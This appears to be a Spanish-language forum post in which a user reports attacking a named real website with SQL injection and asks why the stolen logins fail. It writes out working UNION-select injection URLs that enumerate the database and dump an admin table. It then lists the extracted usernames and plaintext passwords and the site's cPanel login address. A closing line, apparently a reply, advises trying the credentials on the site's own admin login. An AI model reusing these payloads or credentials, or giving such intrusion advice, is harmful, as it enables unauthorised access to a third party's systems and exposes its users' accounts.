buenos dias gente, llevo tiempo viendo tutoriales de aca sobre SQLI.
y me toco manos a la obra.
la pagina la siguiente: www.sniper.cl, no quiero eliminar, ni hacer daño al sitio web. solo poder entrar.
https://www.sniper.cl/index.php?id=VerCategoria&Cat=-1+union+select+1,group_concat(tables_name),3,4,5+from+information_schema.tables--
https://www.sniper.cl/index.php?id=VerCategoria&Cat=-1+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x7573756172696f5f61646d696e
https://www.sniper.cl/index.php?id=VerCategoria&Cat=-1+union+select+1,group_concat(id,0x3d,usuario,0x3d,clave,0x3d,tipo_usuario),3,4,5+from+usuario_admin
ahora ahora puedo sacar los usuarios, pero al momento del login, todo usuario y clave, es erronea.
2=Admin=Acceso2013Sniper82=admin,8=sharp=sharp123=vendedor,9=cyberkaia=wh8034$=admin
login: https://sniper.cl:2083/ es en cpanel.
cual es mi error? o si pueden orientarme en que estoy equivocandome?
Muchas veces no es la cuenta del cpanel sino la cuenta que conecta el admin a la pagina como usuario normal